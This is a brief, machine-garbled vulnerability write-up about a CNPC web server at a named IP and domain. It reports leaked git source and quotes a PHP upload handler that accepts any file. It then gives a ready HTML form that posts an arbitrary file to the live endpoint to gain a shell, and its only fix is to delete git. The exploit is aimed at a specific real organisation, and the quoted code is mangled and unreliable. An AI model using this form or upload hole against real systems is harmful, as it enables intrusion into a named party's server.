Reconstruction of the source code of a station of CNPC to GetShell

Reconstruction of the source code of a station of CNPC to GetShell

Reconstruction of the source code of a station of CNPC to getshell

1.85.51.141 git source code Leakage

Corresponding Domain Name

Http://mtp.cnpc.com.cn
 

 

 

 

Audit code

/Resources/data/appstore/appOperate. php

Start with line 31
 

If ($ act = 'uploadfile') {if (! Is_dir (".. /.. /files/appfiles ") {// If the folder mkdir (".. /.. /files/appfiles ", 0777); // create a folder chmod (".. /.. /files/appfiles ", 0777); // change file mode} // upload the app file appFileName $ appname = $ _ FILES ['appfilename'] ['name']; $ mktime = time (); // create a folder $ mkfile = '.. /.. /files/appfiles /'. $ mktime. '/'; mkdir ($ mkfile, 0777); // $ optionDir = '/mdm/www/resources/files/appfiles /'. $ mktime; // exec ('chmod 0777 '. $ optionDir); $ rand = $ mktime. substr ($ appname, strrpos ($ appname ,". "); $ destination = $ mkfile. $ rand; $ _ SESSION ['filepath'] = $ mktime; $ _ SESSION ['filename'] = $ rand; if (move_uploaded_file ($ _ FILES ['appfilename'] ['tmp _ name'], $ destination) {$ arr = array ('success' => true, 'filename' => $ rand, 'localname' => $ appname);} else {$ arr = array ('success' => false, 'reason '=> $ destination);} echo json_encode ($ arr );

Arbitrary File Upload

Form
 

<form method="post" action="http://mtp.cnpc.com.cn/resources/data/appstore/appOperate.php" enctype="multipart/form-data">  <input name="appFileName" type="file" />  <input name="action" type="text" value="uploadFile"/>  <input name="submit" type="submit" /></form>

 

 

Solution:

Delete git